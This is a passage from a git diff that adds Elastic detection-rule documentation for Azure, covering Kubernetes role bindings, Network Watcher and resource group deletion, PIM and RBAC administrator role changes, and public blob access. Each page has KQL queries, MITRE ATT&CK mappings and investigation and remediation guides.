+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE" and +event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Service Stop +** ID: T1489 +** Reference URL: https://attack.mitre.org/techniques/T1489/ +* Technique: +** Name: System Shutdown/Reboot +** ID: T1529 +** Reference URL: https://attack.mitre.org/techniques/T1529/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-kubernetes-rolebindings-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-kubernetes-rolebindings-created.asciidoc new file mode 100644 index 0000000000..ca5a9279ba --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-kubernetes-rolebindings-created.asciidoc @@ -0,0 +1,131 @@ +[[prebuilt-rule-8-19-8-azure-kubernetes-rolebindings-created]] +=== Azure Kubernetes Rolebindings Created + +Identifies the creation of role binding or cluster role bindings. You can assign these roles to Kubernetes subjects (users, groups, or service accounts) with role bindings and cluster role bindings. An adversary who has permissions to create bindings and cluster-bindings in the cluster can create a binding to the cluster-admin ClusterRole or to other high privileges roles. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +* https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Identity and Access Audit +* Tactic: Privilege Escalation +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Kubernetes Rolebindings Created* + +Azure Kubernetes role bindings are crucial for managing access control within Kubernetes clusters, allowing specific permissions to be assigned to users, groups, or service accounts. Adversaries with the ability to create these bindings can escalate privileges by assigning themselves or others high-level roles, such as cluster-admin. The detection rule monitors Azure activity logs for successful creation events of role or cluster role bindings, signaling potential unauthorized privilege escalation attempts. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the user or service account associated with the role binding creation event. 
Focus on the `event.dataset` and `azure.activitylogs.operation_name` fields to confirm the specific operation. +- Check the `event.outcome` field to ensure the operation was successful and not a failed attempt, which might indicate a misconfiguration or testing. +- Investigate the permissions and roles assigned to the identified user or service account to determine if they have legitimate reasons to create role bindings or cluster role bindings. +- Examine the context of the role binding creation, such as the time of the event and any related activities, to identify any unusual patterns or correlations with other suspicious activities. +- Verify if the role binding grants elevated privileges, such as cluster-admin, and assess the potential impact on the cluster's security posture. +- Cross-reference the event with any recent changes in the cluster's configuration or access policies to understand if the role binding creation aligns with authorized administrative actions. + + +*False positive analysis* + + +- Routine administrative tasks may trigger alerts when legitimate users create role bindings for operational purposes. To manage this, identify and whitelist specific user accounts or service accounts that regularly perform these tasks. +- Automated deployment tools or scripts that configure Kubernetes clusters might create role bindings as part of their normal operation. Exclude these tools by filtering out known service accounts or IP addresses associated with these automated processes. +- Scheduled maintenance or updates to the Kubernetes environment can result in multiple role binding creation events. Establish a maintenance window and suppress alerts during this period to avoid unnecessary noise. +- Development and testing environments often have frequent role binding changes. Consider creating separate monitoring rules with adjusted thresholds or risk scores for these environments to reduce false positives. +- Collaboration with the DevOps team can help identify expected role binding changes, allowing for preemptive exclusion of these events from triggering alerts. + + +*Response and remediation* + + +- Immediately revoke any newly created role bindings or cluster role bindings that are unauthorized or suspicious to prevent further privilege escalation. +- Isolate the affected Kubernetes cluster from the network to prevent potential lateral movement or further exploitation by the adversary. +- Conduct a thorough review of recent activity logs to identify any unauthorized access or changes made by the adversary, focusing on the time frame around the alert. +- Reset credentials and access tokens for any compromised accounts or service accounts involved in the unauthorized role binding creation. +- Escalate the incident to the security operations team for further investigation and to determine if additional clusters or resources are affected. +- Implement additional monitoring and alerting for any future role binding or cluster role binding creation events to ensure rapid detection and response. +- Review and tighten role-based access control (RBAC) policies to ensure that only necessary permissions are granted to users, groups, and service accounts, minimizing the risk of privilege escalation. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
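+
+When correlating the binding creation with other suspicious cluster activity, one simple pivot is to review cluster role binding writes together with Kubernetes event deletions, since an actor who escalates privileges may also attempt to cover their tracks. The query below is an illustrative hunting pivot built from operation names used elsewhere in this rule package; it is not part of the rule itself.
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and azure.activitylogs.operation_name:
+  ("MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE" or
+  "MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE") and
+event.outcome:(Success or success)
+
+----------------------------------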
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name: + ("MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/WRITE" or + "MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE") and +event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-network-watcher-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-network-watcher-deletion.asciidoc new file mode 100644 index 0000000000..7788ababf3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-network-watcher-deletion.asciidoc @@ -0,0 +1,118 @@ +[[prebuilt-rule-8-19-8-azure-network-watcher-deletion]] +=== Azure Network Watcher Deletion + +Identifies the deletion of a Network Watcher in Azure. Network Watchers are used to monitor, diagnose, view metrics, and enable or disable logs for resources in an Azure virtual network. An adversary may delete a Network Watcher in an attempt to evade defenses. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/network-watcher/network-watcher-monitoring-overview + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Network Security Monitoring +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Network Watcher Deletion* + + +Azure Network Watcher is a vital tool for monitoring and diagnosing network issues within Azure environments. It provides insights and logging capabilities crucial for maintaining network security. Adversaries may delete Network Watchers to disable these monitoring functions, thereby evading detection. The detection rule identifies such deletions by monitoring Azure activity logs for specific delete operations, flagging successful attempts as potential security threats. 
+ + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the deletion event by checking for the operation name "MICROSOFT.NETWORK/NETWORKWATCHERS/DELETE" and ensuring the event outcome is marked as "Success" or "success". +- Identify the user or service principal responsible for the deletion by examining the associated user identity or service principal ID in the activity logs. +- Investigate the timeline of events leading up to the deletion by reviewing related activity logs for any unusual or unauthorized access patterns or changes in permissions. +- Assess the impact of the deletion by determining which resources were being monitored by the deleted Network Watcher and evaluating the potential security implications. +- Check for any other suspicious activities or alerts in the Azure environment that may indicate a broader attack or compromise, focusing on defense evasion tactics. + + +*False positive analysis* + + +- Routine maintenance activities by authorized personnel may trigger the deletion alert. Verify if the deletion aligns with scheduled maintenance and consider excluding these operations from alerts. +- Automated scripts or tools used for infrastructure management might delete Network Watchers as part of their normal operation. Identify these scripts and whitelist their activity to prevent false positives. +- Changes in network architecture or resource reallocation can lead to legitimate deletions. Review change management logs to confirm if the deletion was planned and adjust the detection rule to exclude these scenarios. +- Test environments often undergo frequent changes, including the deletion of Network Watchers. If these environments are known to generate false positives, consider creating exceptions for specific resource groups or subscriptions associated with testing. + + +*Response and remediation* + + +- Immediately isolate the affected Azure resources to prevent further unauthorized actions. This can be done by restricting network access or applying stricter security group rules. +- Review Azure activity logs to identify the user or service principal responsible for the deletion. Verify if the action was authorized and investigate any suspicious accounts. +- Restore the deleted Network Watcher by redeploying it in the affected regions to resume monitoring and logging capabilities. +- Conduct a security review of the affected Azure environment to identify any other potential misconfigurations or unauthorized changes. +- Implement stricter access controls and auditing for Azure resources, ensuring that only authorized personnel have the ability to delete critical monitoring tools like Network Watchers. +- Escalate the incident to the security operations team for further investigation and to determine if additional security measures are necessary. +- Enhance detection capabilities by ensuring that alerts for similar deletion activities are configured to notify the security team immediately. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
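+
+To check whether the Network Watcher deletion is part of a broader destructive or defense-evasion sequence, it can help to review it alongside other high-impact deletions such as resource group deletions. The query below is an illustrative hunting pivot, not part of the rule; the resource group deletion operation name comes from a related rule in this package, and the query should be adjusted to your environment.
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and azure.activitylogs.operation_name:
+  ("MICROSOFT.NETWORK/NETWORKWATCHERS/DELETE" or
+  "MICROSOFT.RESOURCES/SUBSCRIPTIONS/RESOURCEGROUPS/DELETE") and
+event.outcome:(Success or success)
+
+----------------------------------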
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.NETWORK/NETWORKWATCHERS/DELETE" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-privilege-identity-management-role-modified.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-privilege-identity-management-role-modified.asciidoc new file mode 100644 index 0000000000..37629a36b9 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-privilege-identity-management-role-modified.asciidoc @@ -0,0 +1,134 @@ +[[prebuilt-rule-8-19-8-azure-privilege-identity-management-role-modified]] +=== Azure Privilege Identity Management Role Modified + +Azure Active Directory (AD) Privileged Identity Management (PIM) is a service that enables you to manage, control, and monitor access to important resources in an organization. PIM can be used to manage the built-in Azure resource roles such as Global Administrator and Application Administrator. An adversary may add a user to a PIM role in order to maintain persistence in their target's environment or modify a PIM role to weaken their target's security controls. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.auditlogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-resource-roles-assign-roles +* https://docs.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-configure + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Identity and Access Audit +* Resources: Investigation Guide +* Tactic: Persistence + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Azure Privilege Identity Management Role Modified* + + +Azure Active Directory (AD) Privileged Identity Management (PIM) is a service that enables you to manage, control, and monitor access to important resources in an organization. PIM can be used to manage the built-in Azure resource roles such as Global Administrator and Application Administrator. + +This rule identifies the update of PIM role settings, which can indicate that an attacker has already gained enough access to modify role assignment settings. + + +*Possible investigation steps* + + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate other alerts associated with the user account during the past 48 hours. +- Consider the source IP address and geolocation for the user who issued the command. Do they look normal for the user? +- Consider the time of day. 
If the user is a human, not a program or script, did the activity take place during a normal time of day? +- Check if this operation was approved and performed according to the organization's change management policy. +- Contact the account owner and confirm whether they are aware of this activity. +- Examine the account's commands, API calls, and data management actions in the last 24 hours. +- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours. + + +*False positive analysis* + + +- If this activity didn't follow your organization's change management policies, it should be reviewed by the security team. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Disable or limit the account during the investigation and response. +- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context: + - Identify the account role in the cloud environment. + - Assess the criticality of affected services and servers. + - Work with your IT team to identify and minimize the impact on users. + - Identify if the attacker is moving laterally and compromising other accounts, servers, or services. + - Identify any regulatory or legal ramifications related to this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions. +- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users. +- Restore the PIM roles to the desired state. +- Consider enabling multi-factor authentication for users. +- Follow security best practices https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices[outlined] by Microsoft. +- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
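+
+Because a weakened PIM role setting is often followed by a suspicious role assignment, reviewing setting updates together with PIM member additions in the same window can speed up triage. The query below is an illustrative hunting pivot that combines operation names documented in this rule package and intentionally omits the outcome filter so failed attempts are included; it is not part of the rule.
+
+[source, js]
+----------------------------------
+event.dataset:azure.auditlogs and azure.auditlogs.operation_name:
+  ("Update role setting in PIM" or
+  "Add eligible member to role in PIM completed (permanent)" or
+  "Add member to role in PIM completed (timebound)")
+
+----------------------------------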
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Update role setting in PIM" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-rbac-built-in-administrator-roles-assigned.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-rbac-built-in-administrator-roles-assigned.asciidoc new file mode 100644 index 0000000000..1fec524a8a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-rbac-built-in-administrator-roles-assigned.asciidoc @@ -0,0 +1,138 @@ +[[prebuilt-rule-8-19-8-azure-rbac-built-in-administrator-roles-assigned]] +=== Azure RBAC Built-In Administrator Roles Assigned + +Identifies when a user is assigned a built-in administrator role in Azure RBAC (Role-Based Access Control). These roles provide significant privileges and can be abused by attackers for lateral movement, persistence, or privilege escalation. The privileged built-in administrator roles include Owner, Contributor, User Access Administrator, Azure File Sync Administrator, Reservations Administrator, and Role Based Access Control Administrator. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-azure.activitylogs-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles +* https://orca.security/resources/research-pod/azure-identity-access-management-iam-active-directory-ad/ +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Azure Activity Logs +* Use Case: Identity and Access Audit +* Tactic: Privilege Escalation +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating Azure RBAC Built-In Administrator Roles Assigned* + + +This rule identifies when a user is assigned a built-in administrator role in Azure RBAC (Role-Based Access Control). These roles provide significant privileges and can be abused by attackers for lateral movement, persistence, or privilege escalation. The privileged built-in administrator roles include Owner, Contributor, User Access Administrator, Azure File Sync Administrator, Reservations Administrator, and Role Based Access Control Administrator. Assignment can be done via the Azure portal, Azure CLI, PowerShell, or through API calls. 
Monitoring these assignments helps detect potential unauthorized privilege escalations. + + +*Privileged Built-In Administrator Roles* + +- Contributor: b24988ac-6180-42a0-ab88-20f7382dd24c +- Owner: 8e3af657-a8ff-443c-a75c-2fe8c4bcb635 +- Azure File Sync Administrator: 92b92042-07d9-4307-87f7-36a593fc5850 +- Reservations Administrator: a8889054-8d42-49c9-bc1c-52486c10e7cd +- Role Based Access Control Administrator: f58310d9-a9f6-439a-9e8d-f62e7b41a168 +- User Access Administrator: 18d7d88d-d35e-4fb5-a5c3-7773c20a72d9 + + +*Possible investigation steps* + + +- Identify the user who assigned the role and examine their recent activity for any suspicious actions. +- Review the source IP address and location associated with the role assignment event to assess if it aligns with expected user behavior or if it indicates potential unauthorized access. +- Check the history of role assignments for the user who was assigned the role to determine if this is a recurring pattern or a one-time event. + - Additionally, identify the lifetime of the targeted user account to determine if it is a newly created account or an existing one. +- Determine if the user assigning the role historically has the necessary permissions to assign such roles and has done so in the past. +- Investigate any recent changes or activities performed by the newly assigned administrator to identify any suspicious actions or configurations that may have been altered. +- Correlate with other logs, such as Microsoft Entra ID sign-in logs, to identify any unusual access patterns or behaviors for the user. + + +*False positive analysis* + + +- Legitimate administrators may assign built-in administrator roles during routine operations, maintenance or as required for onboarding new staff. +- Review internal tickets, change logs, or admin activity dashboards for approved operations. + + +*Response and remediation* + + +- If administrative assignment was not authorized: + - Immediately remove the built-in administrator role from the account. + - Disable or lock the account and begin credential rotation. + - Audit activity performed by the account after elevation, especially changes to role assignments and resource access. +- If suspicious: + - Notify the user and confirm whether they performed the action. + - Check for any automation or scripts that could be exploiting unused elevated access paths. + - Review conditional access and PIM (Privileged Identity Management) configurations to limit elevation without approval. +- Strengthen posture: + - Require MFA and approval for all privilege escalation actions. + - Consider enabling JIT (Just-in-Time) access with expiration. 
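+
+During triage, a higher-signal subset can be obtained by restricting the rule logic to fewer role definition IDs, for example Owner and User Access Administrator from the list above. The query below is an illustrative narrowed variant of the rule query, not a replacement for it; validate the role IDs and index pattern in your environment.
+
+[source, js]
+----------------------------------
+event.dataset: azure.activitylogs and
+  event.action: "MICROSOFT.AUTHORIZATION/ROLEASSIGNMENTS/WRITE" and
+  azure.activitylogs.properties.requestbody.properties.roleDefinitionId:
+  (
+    *8e3af657-a8ff-443c-a75c-2fe8c4bcb635* or
+    *18d7d88d-d35e-4fb5-a5c3-7773c20a72d9*
+  )
+
+----------------------------------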
+ + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: azure.activitylogs and + event.action: "MICROSOFT.AUTHORIZATION/ROLEASSIGNMENTS/WRITE" and + azure.activitylogs.properties.requestbody.properties.roleDefinitionId: + ( + *18d7d88d-d35e-4fb5-a5c3-7773c20a72d9* or + *f58310d9-a9f6-439a-9e8d-f62e7b41a168* or + *b24988ac-6180-42a0-ab88-20f7382dd24c* or + *8e3af657-a8ff-443c-a75c-2fe8c4bcb635* or + *92b92042-07d9-4307-87f7-36a593fc5850* or + *a8889054-8d42-49c9-bc1c-52486c10e7cd* + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-resource-group-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-resource-group-deletion.asciidoc new file mode 100644 index 0000000000..1adaf7d5e0 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-resource-group-deletion.asciidoc @@ -0,0 +1,128 @@ +[[prebuilt-rule-8-19-8-azure-resource-group-deletion]] +=== Azure Resource Group Deletion + +Identifies the deletion of a resource group in Azure, which includes all resources within the group. Deletion is permanent and irreversible. An adversary may delete a resource group in an attempt to evade defenses or intentionally destroy data. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-portal + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Log Auditing +* Tactic: Impact +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Resource Group Deletion* + + +Azure Resource Groups are containers that hold related resources for an Azure solution, enabling efficient management and organization. Adversaries may exploit this by deleting entire groups to disrupt services or erase data, causing significant impact. The detection rule monitors Azure activity logs for successful deletion operations, flagging potential malicious actions for further investigation. + + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the deletion event by checking for the operation name "MICROSOFT.RESOURCES/SUBSCRIPTIONS/RESOURCEGROUPS/DELETE" and ensure the event outcome is marked as "Success" or "success". 
+- Identify the user or service principal responsible for the deletion by examining the associated user identity or service principal ID in the activity logs. +- Check the timestamp of the deletion event to determine when the resource group was deleted and correlate this with any other suspicious activities around the same time. +- Investigate the resources contained within the deleted resource group to assess the potential impact, including any critical services or data that may have been affected. +- Review any recent changes in permissions or roles assigned to the user or service principal involved in the deletion to identify potential privilege escalation or misuse. +- Examine any related alerts or logs for unusual activities or patterns that might indicate a broader attack or compromise within the Azure environment. + + +*False positive analysis* + + +- Routine maintenance activities by IT teams may trigger alerts when resource groups are intentionally deleted as part of regular updates or infrastructure changes. To manage this, create exceptions for known maintenance windows or specific user accounts responsible for these tasks. +- Automated scripts or deployment tools that manage resource lifecycles might delete resource groups as part of their normal operation. Identify these scripts and exclude their activity from alerts by filtering based on the service principal or automation account used. +- Testing environments often involve frequent creation and deletion of resource groups. Exclude these environments from alerts by tagging them appropriately and configuring the detection rule to ignore actions on tagged resources. +- Mergers or organizational restructuring can lead to legitimate resource group deletions. Coordinate with relevant departments to anticipate these changes and temporarily adjust monitoring rules to prevent false positives. +- Ensure that any third-party services or consultants with access to your Azure environment are accounted for, as their activities might include resource group deletions. Establish clear communication channels to verify their actions and adjust monitoring rules accordingly. + + +*Response and remediation* + + +- Immediately isolate the affected Azure subscription to prevent further unauthorized actions. This can be done by temporarily disabling access or applying strict access controls. +- Review and revoke any suspicious or unauthorized access permissions associated with the affected resource group to prevent further exploitation. +- Restore the deleted resources from backups if available. Ensure that backup and recovery processes are validated and functioning correctly. +- Conduct a thorough audit of recent Azure activity logs to identify any other potentially malicious actions or compromised accounts. +- Escalate the incident to the security operations team for a detailed investigation and to determine if there are broader implications or related threats. +- Implement additional monitoring and alerting for similar deletion activities across all Azure subscriptions to enhance early detection of such threats. +- Review and strengthen access management policies, ensuring that only authorized personnel have the necessary permissions to delete resource groups. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
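+
+For false positive analysis, it can help to gauge how routine resource group deletions are in your environment by reviewing recent deletion attempts regardless of outcome and noting which identities perform them. The query below is an illustrative hunting variant of the rule logic with the outcome filter removed; it is not part of the rule.
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.RESOURCES/SUBSCRIPTIONS/RESOURCEGROUPS/DELETE"
+
+----------------------------------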
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.RESOURCES/SUBSCRIPTIONS/RESOURCEGROUPS/DELETE" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-storage-account-blob-public-access-enabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-storage-account-blob-public-access-enabled.asciidoc new file mode 100644 index 0000000000..3a2d3a1aa4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-storage-account-blob-public-access-enabled.asciidoc @@ -0,0 +1,115 @@ +[[prebuilt-rule-8-19-8-azure-storage-account-blob-public-access-enabled]] +=== Azure Storage Account Blob Public Access Enabled + +Identifies when Azure Storage Account Blob public access is enabled, allowing external access to blob containers. This technique was observed in cloud ransom-based campaigns where threat actors modified storage accounts to expose non-remotely accessible accounts to the internet for data exfiltration. Adversaries abuse the Microsoft.Storage/storageAccounts/write operation to modify public access settings. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-azure.activitylogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ +* https://docs.microsoft.com/en-us/azure/storage/blobs/anonymous-read-access-configure + +*Tags*: + +* Domain: Cloud +* Domain: Storage +* Data Source: Azure +* Data Source: Azure Activity Logs +* Use Case: Threat Detection +* Tactic: Collection +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Azure Storage Account Blob Public Access Enabled* + + +Azure Storage Accounts provide cloud storage solutions with various access control mechanisms. The public access setting, when enabled, allows anonymous internet access to blob containers, bypassing authentication requirements. Adversaries exploit this feature to expose sensitive data for exfiltration or to establish persistent external access. This detection monitors for successful modifications that enable public blob access, a technique notably used in STORM-0501 cloud ransom-based campaigns. 
+
+
+*Possible investigation steps*
+
+
+- Review the Azure activity logs to identify the user or service principal that initiated the storage account modification by examining the principal ID, UPN, and user agent fields.
+- Check the specific storage account name in `azure.resource.name` to understand which storage resources were affected and assess the sensitivity of data stored there.
